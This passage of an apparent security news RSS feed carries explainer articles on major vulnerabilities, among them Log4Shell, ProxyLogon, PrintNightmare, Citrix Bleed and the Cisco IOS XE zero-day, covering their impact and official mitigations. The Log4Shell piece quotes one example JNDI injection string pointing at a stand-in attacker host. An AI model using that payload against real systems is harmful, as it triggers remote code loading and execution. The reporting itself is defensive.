&lt;p&gt;Apply Microsoft&apos;s September 2021 cumulative security updates addressing CVE-2021-40444, and in environments where immediate patching isn&apos;t possible, apply the documented registry-based interim mitigation. The vulnerability was added to CISA&apos;s KEV catalog given confirmed active exploitation. Full technical detail is in &lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444&quot;&gt;Microsoft&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-40444&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-01-mshtml-office-zero-day-cve-2021-40444/cover.jpg" medium="image" width="1200" height="675"/><category>CVE-2021-40444</category><category>MSHTML</category><category>Office zero-day</category><category>ActiveX</category><category>phishing</category></item><item><title>ProxyLogon: Inside the Exchange Server Attack Chain That Triggered an FBI Court Order</title><link>https://0daynews.com/articles/2026-07-01-proxylogon-exchange-server-attack-chain/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-07-01-proxylogon-exchange-server-attack-chain/</guid><description>CVE-2021-26855 and three chained Exchange Server bugs gave attackers unauthenticated remote code execution — and led to a compromise event so widespread the FBI obtained a court order to remove webshells itself.</description><pubDate>Wed, 01 Jul 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Most major exploit chains stay in the realm of &quot;organizations should patch faster.&quot; &lt;a href=&quot;/cve/cve-2021-26855/&quot;&gt;CVE-2021-26855&lt;/a&gt;, the first link in the &quot;ProxyLogon&quot; chain against on-premises Microsoft Exchange Server, escalated to something rarer: a court-authorized FBI operation to remove malware from privately owned servers whose administrators hadn&apos;t cleaned them up.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;On its own, CVE-2021-26855 is a server-side request forgery (SSRF) bug: an unauthenticated attacker could make Exchange send arbitrary HTTP requests and, critically, authenticate to the server as if the request came from Exchange itself. Chained with three additional Exchange vulnerabilities — CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 — that authentication bypass became a path to writing an arbitrary file to disk: a webshell, planted with no authentication required at any step.&lt;/p&gt;
&lt;h2&gt;The disclosure and immediate fallout&lt;/h2&gt;
&lt;p&gt;Microsoft disclosed the chain and shipped emergency patches on March 2, 2021, attributing initial, narrow exploitation to a threat group it named Hafnium, focused on espionage against specific organizations. That narrow window didn&apos;t last. Within days, exploitation shifted from targeted intrusion to indiscriminate mass scanning: multiple opportunistic threat actors raced to plant webshells on every reachable, unpatched on-premises Exchange server before defenders could patch, expanding the victim count from a targeted set into tens of thousands of organizations worldwide.&lt;/p&gt;
&lt;h2&gt;Why the FBI got involved&lt;/h2&gt;
&lt;p&gt;By the time many organizations applied Microsoft&apos;s patch, webshells had already been planted — and patching alone doesn&apos;t remove a webshell already sitting on disk. A significant number of compromised, internet-facing Exchange servers went unremediated even after the patch was available, their owners apparently unaware they&apos;d already been breached. In April 2021, the U.S. Department of Justice announced the FBI had obtained a court order authorizing agents to remotely access hundreds of vulnerable Exchange servers and remove the specific webshells left by the Hafnium campaign — without notifying the owners in advance, an extraordinary step reflecting the scale of unremediated compromise.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;CISA issued an emergency directive requiring federal agencies to patch or disconnect vulnerable on-premises Exchange servers within days, not weeks — a compressed timeline unusual even for CISA&apos;s most urgent bulletins. The core guidance: patch immediately, and separately check for indicators of prior compromise (webshells, unusual mailbox exports) rather than assuming a clean patch means a clean server. Full technical detail on the four-CVE chain and detection guidance is in &lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855&quot;&gt;Microsoft&apos;s security response&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-26855&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the attack chain&apos;s impact and official detection/mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-07-01-proxylogon-exchange-server-attack-chain/cover.jpg" medium="image" width="1200" height="675"/><category>ProxyLogon</category><category>CVE-2021-26855</category><category>Exchange Server</category><category>Hafnium</category><category>webshell</category></item><item><title>PrintNightmare: How a Leaked Proof-of-Concept Forced an Emergency Windows Patch</title><link>https://0daynews.com/articles/2026-06-30-printnightmare-windows-print-spooler-explained/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-30-printnightmare-windows-print-spooler-explained/</guid><description>CVE-2021-34527 let attackers turn the Windows Print Spooler service — running by default on nearly every Windows machine — into a path to SYSTEM privileges or full domain compromise.</description><pubDate>Tue, 30 Jun 2026 15:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Windows&apos; Print Spooler service is one of those pieces of infrastructure most administrators never think about — it runs by default, quietly, on nearly every Windows machine, including domain controllers that print nothing at all. &lt;a href=&quot;/cve/cve-2021-34527/&quot;&gt;CVE-2021-34527&lt;/a&gt;, nicknamed &quot;PrintNightmare,&quot; turned that quiet default into an emergency out-of-band patch.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;The Print Spooler service supports remote installation of printer drivers, a legitimate feature for centrally managing printers across a network. PrintNightmare abuses that capability: an authenticated attacker — even a low-privileged domain user — could trigger the spooler to install a malicious driver, and the spooler service runs with SYSTEM privileges. On a workstation, that&apos;s local privilege escalation. On a domain controller, where the spooler commonly runs by default, that&apos;s a path to full domain compromise.&lt;/p&gt;
&lt;h2&gt;How it came to light&lt;/h2&gt;
&lt;p&gt;The vulnerability&apos;s public disclosure was unusually chaotic. A distinct, related spooler bug (CVE-2021-1675) was already being patched by Microsoft when researchers, apparently believing the two issues were the same and already fixed, briefly published proof-of-concept exploit code for PrintNightmare — which was, in fact, still unpatched. Microsoft issued an emergency out-of-band security advisory on July 1, 2021, days ahead of its normal Patch Tuesday cycle, given that working exploit code was now public.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;The vulnerable functionality was so deeply embedded in how the spooler service worked that Microsoft&apos;s initial patch didn&apos;t fully close the hole — several follow-on bypasses were reported and patched over subsequent months. That extended uncertainty pushed many security teams toward a more drastic interim step: disabling the Print Spooler service entirely on servers where printing wasn&apos;t actually needed, which became Microsoft&apos;s own recommended hardening guidance for high-security environments, domain controllers especially.&lt;/p&gt;
&lt;p&gt;CISA added the CVE to its Known Exploited Vulnerabilities catalog given confirmed active exploitation, and federal agencies were required to apply mitigations on an accelerated timeline.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Apply Microsoft&apos;s cumulative security updates addressing PrintNightmare and its follow-on bypasses, and where the Print Spooler service isn&apos;t required — particularly on domain controllers — disable it rather than rely on patching alone. Full technical detail and guidance are in &lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527&quot;&gt;Microsoft&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-34527&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-30-printnightmare-windows-print-spooler-explained/cover.jpg" medium="image" width="1200" height="675"/><category>PrintNightmare</category><category>CVE-2021-34527</category><category>Windows Print Spooler</category><category>privilege escalation</category><category>domain controller compromise</category></item><item><title>Log4Shell, Explained: Why a Logging Library Became the Internet&apos;s Worst Week</title><link>https://0daynews.com/articles/2026-06-30-log4shell-log4j-anniversary-explainer/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-30-log4shell-log4j-anniversary-explainer/</guid><description>CVE-2021-44228 turned a single misused feature in Apache Log4j2 — a Java logging library embedded almost everywhere — into one of the most widely exploited vulnerabilities ever recorded.</description><pubDate>Tue, 30 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Some vulnerabilities are dangerous because of a coding mistake in one application. &lt;a href=&quot;/cve/cve-2021-44228/&quot;&gt;CVE-2021-44228&lt;/a&gt; — &quot;Log4Shell&quot; — was dangerous because of a design decision buried inside a dependency almost nobody outside a small circle of Java developers had ever heard of, embedded in an enormous share of the software running the internet.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;Apache Log4j2 is a logging library: code that writes application events — errors, requests, debug traces — to a file or console. One of its features, message lookup substitution, let a logged string trigger a JNDI (Java Naming and Directory Interface) lookup. That&apos;s normally an obscure convenience feature. The problem: Log4j2 would perform this lookup on &lt;em&gt;any&lt;/em&gt; string it logged, including strings supplied directly by a user — a chat message, an HTTP header, a search box entry.&lt;/p&gt;
&lt;p&gt;An attacker who could get a string like &lt;code&gt;${jndi:ldap://attacker.com/a}&lt;/code&gt; logged anywhere in a vulnerable application could cause that application to reach out to an attacker-controlled server and load — and execute — malicious Java code. No authentication. No special access. Just a string ending up somewhere in a log file.&lt;/p&gt;
&lt;h2&gt;Why it spread so fast&lt;/h2&gt;
&lt;p&gt;Log4j2 isn&apos;t usually something developers add directly to their own applications&apos; top-level dependency list — it&apos;s typically pulled in transitively, several layers deep, by other libraries and frameworks. That made the first challenge not &quot;patch Log4j&quot; but &quot;figure out everywhere Log4j is running,&quot; a nontrivial software-inventory problem most organizations weren&apos;t prepared to answer quickly. Public demonstrations, starting with Minecraft&apos;s chat-based exploitation within hours of disclosure on December 10, 2021, showed how trivially the bug could be triggered — and mass internet scanning for vulnerable endpoints began almost immediately after.&lt;/p&gt;
&lt;h2&gt;The scale of the fallout&lt;/h2&gt;
&lt;p&gt;CISA and international CERT agencies issued emergency directives. The initial Apache patch, Log4j 2.15.0, turned out to be incomplete, and two further related issues (CVE-2021-45046, CVE-2021-45105) required additional point releases before the library was considered fully remediated at 2.17.x. Security teams spent weeks, in some organizations months, on inventory and remediation — a process complicated by the sheer number of vendors who had to identify, patch, and re-ship their own products before customers could even apply an update.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;The core guidance from the Apache Logging Services team and CISA was consistent throughout: upgrade to a patched Log4j2 release (2.17.1 or later for the full remediation), and where immediate upgrade isn&apos;t possible, apply documented interim mitigations (disabling the JNDI lookup feature via system property, or removing the vulnerable class from the classpath). Full technical detail, affected version ranges, and patch guidance are in &lt;a href=&quot;https://logging.apache.org/log4j/2.x/security.html&quot;&gt;Apache&apos;s security advisory&lt;/a&gt; and the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2021-44228&quot;&gt;NVD entry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s mechanism and official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-30-log4shell-log4j-anniversary-explainer/cover.jpg" medium="image" width="1200" height="675"/><category>Log4Shell</category><category>CVE-2021-44228</category><category>Apache Log4j2</category><category>JNDI injection</category><category>remote code execution</category></item><item><title>The Outlook &apos;MonikerLink&apos; Bug: One Click, Protected View Bypassed</title><link>https://0daynews.com/articles/2026-06-28-outlook-monikerlink-rce-patch-tuesday-explainer/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-28-outlook-monikerlink-rce-patch-tuesday-explainer/</guid><description>CVE-2024-21413 let attackers bypass Outlook&apos;s Protected View sandbox with a single specially crafted hyperlink, leading to code execution and potential credential leakage. Patched in February 2024&apos;s Patch Tuesday.</description><pubDate>Sun, 28 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Most enterprise phishing defenses assume that even if a user clicks something they shouldn&apos;t, sandboxing and content protections will limit the damage. &lt;a href=&quot;/cve/cve-2024-21413/&quot;&gt;CVE-2024-21413&lt;/a&gt; — nicknamed &quot;MonikerLink&quot; by Check Point Research, which discovered and reported it — broke that assumption for Microsoft Outlook with a single click.&lt;/p&gt;
&lt;h2&gt;How the bug works&lt;/h2&gt;
&lt;p&gt;Outlook normally opens untrusted file attachments and links inside Protected View, a sandboxed mode that strips out active content and limits what a document can do until the user explicitly trusts it. MonikerLink found a way around that: by crafting a hyperlink using the &lt;code&gt;file://&lt;/code&gt; moniker syntax with a specific exclamation-mark suffix appended, an attacker could cause Outlook to open the referenced file directly, completely bypassing Protected View.&lt;/p&gt;
&lt;p&gt;The consequences ranged from remote code execution to, in some configurations, leaking the user&apos;s NTLM credential hash to an attacker-controlled server — useful for relay attacks even without full code execution.&lt;/p&gt;
&lt;h2&gt;Disclosure and patch&lt;/h2&gt;
&lt;p&gt;Microsoft patched CVE-2024-21413 as part of its &lt;a href=&quot;https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413&quot;&gt;February 2024 Patch Tuesday release&lt;/a&gt;, assigning it a CVSS score of 9.8. Unlike several other vulnerabilities covered by this desk, Microsoft did not confirm active in-the-wild exploitation at time of disclosure — but security teams treated it as a same-week priority patch regardless, given how trivial the trigger condition was (one click on a link inside an email) and how often Protected-View-bypass techniques get weaponized shortly after public disclosure.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Outlook remains one of the most widely deployed email clients in enterprise environments, and email is still the dominant initial-access vector for ransomware and business email compromise campaigns. A bug that defeats a core anti-exploitation control with a single click — no macro, no attachment download, just a link — is precisely the kind of flaw that lowers the bar for a successful phishing campaign from &quot;convince someone to enable macros&quot; to &quot;convince someone to click.&quot;&lt;/p&gt;
&lt;p&gt;Full technical writeup and the patch itself are documented in &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2024-21413&quot;&gt;Microsoft&apos;s MSRC advisory&lt;/a&gt; and the linked NVD record.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability and its real-world impact only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-28-outlook-monikerlink-rce-patch-tuesday-explainer/cover.jpg" medium="image" width="1200" height="675"/><category>Microsoft Outlook</category><category>CVE-2024-21413</category><category>MonikerLink</category><category>Patch Tuesday</category><category>Protected View bypass</category></item><item><title>PAN-OS GlobalProtect Zero-Day Gave Attackers Root on the Firewall Itself</title><link>https://0daynews.com/articles/2026-06-27-pan-os-globalprotect-command-injection-zero-day/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-27-pan-os-globalprotect-command-injection-zero-day/</guid><description>CVE-2024-3400, a maximum-severity command-injection flaw in Palo Alto Networks&apos; PAN-OS GlobalProtect feature, was exploited in the wild before a patch existed — handing attackers root access to the perimeter firewall.</description><pubDate>Sat, 27 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;A firewall is supposed to be the wall. When the wall itself has a remotely exploitable, unauthenticated, root-level code-execution flaw, the entire premise of perimeter defense breaks down — which is exactly the scenario &lt;a href=&quot;/cve/cve-2024-3400/&quot;&gt;CVE-2024-3400&lt;/a&gt; created for Palo Alto Networks customers in April 2024.&lt;/p&gt;
&lt;h2&gt;What the flaw allowed&lt;/h2&gt;
&lt;p&gt;CVE-2024-3400 is a command-injection vulnerability in the GlobalProtect feature of PAN-OS, the operating system running on Palo Alto Networks&apos; next-generation firewalls. On specific PAN-OS versions with a GlobalProtect gateway or portal configured — and device telemetry or session ID re-use enabled — an unauthenticated, remote attacker could execute arbitrary code with root privileges directly on the firewall. It carries the maximum CVSS score of 10.0.&lt;/p&gt;
&lt;p&gt;Root code execution on a firewall isn&apos;t just &quot;another RCE.&quot; It means an attacker controls the very device that&apos;s supposed to be inspecting and blocking malicious traffic — with the ability to disable logging, modify rules, pivot into the internal network, and persist across reboots.&lt;/p&gt;
&lt;h2&gt;Active exploitation before disclosure&lt;/h2&gt;
&lt;p&gt;Palo Alto Networks and Volexity jointly disclosed the vulnerability on April 12, 2024, confirming it was being exploited in the wild as a zero-day. Volexity attributed the activity to a threat actor it tracks as UTA0218, which deployed a custom Python-based backdoor — dubbed UPSTYLE — on compromised firewalls to maintain access and pull additional tooling onto the device post-compromise.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&quot;&gt;CVE-2024-3400 was added to CISA&apos;s KEV catalog&lt;/a&gt; within days of disclosure, with federal agencies required to apply mitigations or patches on an expedited timeline.&lt;/p&gt;
&lt;h2&gt;The response&lt;/h2&gt;
&lt;p&gt;Palo Alto Networks moved quickly, publishing both temporary mitigation steps — for customers who could not immediately patch — and hotfixes across the affected PAN-OS version branches. The company also released a tool to help customers determine whether a given firewall showed signs of compromise, since (as with several other zero-days on this tracker) patching alone does not undo an established backdoor on an already-compromised device.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Perimeter security devices — firewalls, VPN gateways, secure web gateways — have increasingly become the entry point of choice for sophisticated attackers precisely because they&apos;re internet-facing by design and historically under-monitored relative to standard endpoints. A root-RCE zero-day in a market-leading firewall product is about as severe an instance of that pattern as exists.&lt;/p&gt;
&lt;p&gt;Full advisory detail, affected configurations, and patch guidance are published by &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2024-3400&quot;&gt;Palo Alto Networks&lt;/a&gt; and reflected in the NVD record above.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability and its real-world impact only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-27-pan-os-globalprotect-command-injection-zero-day/cover.jpg" medium="image" width="1200" height="675"/><category>PAN-OS</category><category>CVE-2024-3400</category><category>GlobalProtect</category><category>firewall vulnerability</category><category>command injection</category></item><item><title>Inside the Ivanti Connect Secure Zero-Day Chain Attackers Used Before a Patch Existed</title><link>https://0daynews.com/articles/2026-06-26-ivanti-connect-secure-chained-zero-days-explained/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-26-ivanti-connect-secure-chained-zero-days-explained/</guid><description>CVE-2023-46805 and CVE-2024-21887, chained together, gave a suspected nation-state actor unauthenticated remote code execution on Ivanti Connect Secure and Policy Secure VPN gateways for weeks before patches.</description><pubDate>Fri, 26 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Two vulnerabilities, neither individually catastrophic on paper, became one of the more consequential edge-device exploitation chains of early 2024 when attackers combined them against Ivanti&apos;s VPN gateway products.&lt;/p&gt;
&lt;h2&gt;The two flaws&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;/cve/cve-2023-46805/&quot;&gt;CVE-2023-46805&lt;/a&gt; is an authentication-bypass vulnerability in the web component of Ivanti Connect Secure and Policy Secure. On its own, it lets an unauthenticated attacker reach restricted application resources — serious, but limited.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;/cve/cve-2024-21887/&quot;&gt;CVE-2024-21887&lt;/a&gt; is a command-injection vulnerability in the same product line. On its own, exploiting it requires administrative authentication — a meaningful barrier.&lt;/p&gt;
&lt;p&gt;Chained together, the barrier disappears. An attacker uses the authentication bypass to reach the administrative functionality, then uses the command-injection flaw — now reachable without ever logging in — to execute arbitrary commands on the appliance. The combination yields full unauthenticated remote code execution.&lt;/p&gt;
&lt;h2&gt;Who exploited it, and when&lt;/h2&gt;
&lt;p&gt;Ivanti and Mandiant disclosed both vulnerabilities on January 10, 2024, but Mandiant&apos;s investigation found exploitation had begun well before that date, attributing early activity to a suspected China-nexus espionage actor tracked as UNC5221. The actor deployed custom web shells and credential-harvesting tooling, and in some cases attempted to actively evade Ivanti&apos;s own internal integrity checker — the tool customers were told to use to check for compromise.&lt;/p&gt;
&lt;h2&gt;CISA&apos;s emergency directive&lt;/h2&gt;
&lt;p&gt;The combination of severity, confirmed nation-state exploitation, and the position of VPN gateways directly on the network perimeter prompted &lt;a href=&quot;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&quot;&gt;CISA to issue an emergency directive&lt;/a&gt; requiring federal civilian agencies to disconnect affected Ivanti Connect Secure and Policy Secure appliances from their networks — not just patch them — pending mitigation. Both CVEs were added to the KEV catalog simultaneously.&lt;/p&gt;
&lt;h2&gt;The broader pattern&lt;/h2&gt;
&lt;p&gt;Ivanti&apos;s edge appliances were the subject of multiple additional vulnerability disclosures throughout 2024, reinforcing a broader trend: VPN gateways, firewalls, and other perimeter devices — designed to be internet-facing by definition — have become a preferred initial-access vector precisely because they sit outside the protections (EDR, internal monitoring) that organizations apply to standard endpoints.&lt;/p&gt;
&lt;p&gt;Full chain analysis, affected versions, and Ivanti&apos;s remediation timeline are published in &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2024-21887&quot;&gt;Ivanti&apos;s security advisory&lt;/a&gt; and the linked NVD records for both CVEs.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability chain and its real-world impact only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-26-ivanti-connect-secure-chained-zero-days-explained/cover.jpg" medium="image" width="1200" height="675"/><category>Ivanti Connect Secure</category><category>CVE-2023-46805</category><category>CVE-2024-21887</category><category>vulnerability chaining</category><category>VPN appliance security</category></item><item><title>Citrix Bleed: How a Memory Leak in NetScaler Bypassed MFA Entirely</title><link>https://0daynews.com/articles/2026-06-25-citrix-bleed-netscaler-session-hijacking-explained/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-25-citrix-bleed-netscaler-session-hijacking-explained/</guid><description>CVE-2023-4966, known as Citrix Bleed, let attackers pull live session tokens straight out of NetScaler ADC and Gateway memory — hijacking already-authenticated sessions without needing a password or MFA code.</description><pubDate>Thu, 25 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Multi-factor authentication is supposed to be the backstop that makes stolen passwords not enough. &lt;a href=&quot;/cve/cve-2023-4966/&quot;&gt;CVE-2023-4966&lt;/a&gt; — better known by its nickname, Citrix Bleed — demonstrated a category of flaw that skips the password-and-MFA problem entirely: it steals an already-authenticated session.&lt;/p&gt;
&lt;h2&gt;How the bug works, at a high level&lt;/h2&gt;
&lt;p&gt;Citrix Bleed is a buffer-overflow vulnerability in Citrix NetScaler ADC and NetScaler Gateway appliances configured as a gateway — VPN virtual server, ICA proxy, CVPN, or RDP proxy — or as an AAA virtual server. Exploiting it lets a remote, unauthenticated attacker retrieve data directly from the device&apos;s memory, including valid session tokens belonging to legitimate, already-logged-in users.&lt;/p&gt;
&lt;p&gt;Because those tokens represent sessions that have already cleared authentication and MFA, an attacker who captures one can simply present it to the appliance and be treated as that user — no credentials, no second factor, no password reset required. It&apos;s session hijacking with the authentication step already completed by someone else.&lt;/p&gt;
&lt;h2&gt;Exploitation in the wild&lt;/h2&gt;
&lt;p&gt;Citrix disclosed CVE-2023-4966 on October 10, 2023. Mandiant later reported that exploitation had begun even before the public disclosure, and that ransomware-affiliated actors, including groups linked to LockBit, used the flaw to compromise large enterprises — among the most notable publicly reported victims was a major financial-sector firm whose breach was directly tied to Citrix Bleed exploitation. &lt;a href=&quot;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&quot;&gt;CVE-2023-4966 was added to CISA&apos;s KEV catalog&lt;/a&gt; in November 2023.&lt;/p&gt;
&lt;h2&gt;The patching trap that made this worse&lt;/h2&gt;
&lt;p&gt;What made Citrix Bleed especially dangerous operationally: patching the appliance alone was not sufficient. Session tokens stolen before the patch was applied remained valid afterward, because the patch fixed the vulnerability going forward but did nothing to invalidate sessions already hijacked. Citrix&apos;s guidance — and CISA&apos;s — was explicit that administrators needed to kill all active ICA and PCoIP sessions after patching, not just apply the update and move on.&lt;/p&gt;
&lt;h2&gt;Why it mattered&lt;/h2&gt;
&lt;p&gt;Citrix Bleed is a clean illustration of why &quot;we have MFA&quot; is not a complete security story. Token-theft and session-hijacking vulnerabilities sidestep authentication controls entirely, and they&apos;re increasingly the technique of choice for sophisticated ransomware affiliates who&apos;d rather steal a valid session than guess a password.&lt;/p&gt;
&lt;p&gt;Full technical detail, affected build numbers, and remediation steps are published in &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2023-4966&quot;&gt;Citrix&apos;s own security bulletin&lt;/a&gt; and the NVD record.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability and its real-world impact only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-25-citrix-bleed-netscaler-session-hijacking-explained/cover.jpg" medium="image" width="1200" height="675"/><category>Citrix Bleed</category><category>CVE-2023-4966</category><category>NetScaler</category><category>session hijacking</category><category>MFA bypass</category></item><item><title>Cisco IOS XE Web UI Zero-Day: How One Bug Compromised Tens of Thousands of Devices</title><link>https://0daynews.com/articles/2026-06-24-cisco-ios-xe-web-ui-zero-day-mass-exploitation/</link><guid isPermaLink="true">https://0daynews.com/articles/2026-06-24-cisco-ios-xe-web-ui-zero-day-mass-exploitation/</guid><description>CVE-2023-20198, a maximum-severity privilege-escalation flaw in Cisco IOS XE&apos;s web management interface, was exploited at mass scale before a patch existed — handing attackers full admin control of network infrastructure.</description><pubDate>Wed, 24 Jun 2026 13:00:00 GMT</pubDate><content:encoded>&lt;p&gt;When Cisco disclosed CVE-2023-20198 on October 16, 2023, it came with an unusual admission: exploitation was already underway, against an unknown but apparently large number of devices, before any patch existed. By the time independent researchers finished scanning the public internet days later, estimates of compromised Cisco IOS XE devices ran into the tens of thousands.&lt;/p&gt;
&lt;h2&gt;What the vulnerability does&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;/cve/cve-2023-20198/&quot;&gt;CVE-2023-20198&lt;/a&gt; lives in the Web UI feature of Cisco IOS XE Software — the operating system that powers a large share of the world&apos;s enterprise switches, routers, and wireless LAN controllers. The flaw carries the maximum CVSS score of 10.0 because of how little an attacker needs: no authentication, no special access, just the ability to reach the device&apos;s web management interface.&lt;/p&gt;
&lt;p&gt;Successful exploitation lets a remote attacker create a local user account with privilege level 15 — Cisco&apos;s top privilege tier, equivalent to full administrative control of the device. From there, attackers were observed pairing the bug with a second vulnerability, CVE-2023-20273, to inject a persistent implant directly into the device&apos;s filesystem.&lt;/p&gt;
&lt;h2&gt;The scale of exploitation&lt;/h2&gt;
&lt;p&gt;This wasn&apos;t a narrow, targeted campaign. Within days of Cisco&apos;s disclosure, scans of the public internet found tens of thousands of IOS XE devices carrying signs of the implant — a number that made this one of the largest network-device compromise events of 2023. Devices with the web UI feature exposed directly to the internet — a configuration many administrators use for remote management — were the most exposed.&lt;/p&gt;
&lt;p&gt;Cisco&apos;s Talos threat intelligence team published detection guidance, including a curl-based check administrators could run to look for the implant&apos;s signature file, and urged any organization running IOS XE with internet-facing web management to assume compromise and re-image affected devices rather than simply patch and move on, since the implant could survive in some configurations.&lt;/p&gt;
&lt;h2&gt;CISA&apos;s response&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&quot;&gt;CVE-2023-20198&lt;/a&gt; was added to the CISA Known Exploited Vulnerabilities catalog with an expedited remediation deadline reflecting both the severity and the confirmed in-the-wild exploitation. Federal civilian agencies running affected Cisco gear were required to patch or disconnect exposed devices on a compressed timeline.&lt;/p&gt;
&lt;h2&gt;What administrators should do&lt;/h2&gt;
&lt;p&gt;Cisco&apos;s guidance was consistent: disable the web UI feature on internet-facing devices where it isn&apos;t strictly required, apply the patched IOS XE release, and check for the implant specifically — patching alone does not remove an implant already deployed on a compromised device. Full technical detail, affected platforms, and patch availability are in &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2023-20198&quot;&gt;Cisco&apos;s security advisory&lt;/a&gt; and the CISA KEV catalog entry.&lt;/p&gt;
&lt;p&gt;This article describes the vulnerability&apos;s impact and Cisco&apos;s official mitigation guidance only — it does not include exploit code or step-by-step attack instructions.&lt;/p&gt;</content:encoded><dc:creator>0day News Desk</dc:creator><media:content url="https://0daynews.com/articles/2026-06-24-cisco-ios-xe-web-ui-zero-day-mass-exploitation/cover.jpg" medium="image" width="1200" height="675"/><category>Cisco IOS XE</category><category>CVE-2023-20198</category><category>privilege escalation</category><category>KEV catalog</category><category>network device exploitation</category></item></channel></rss>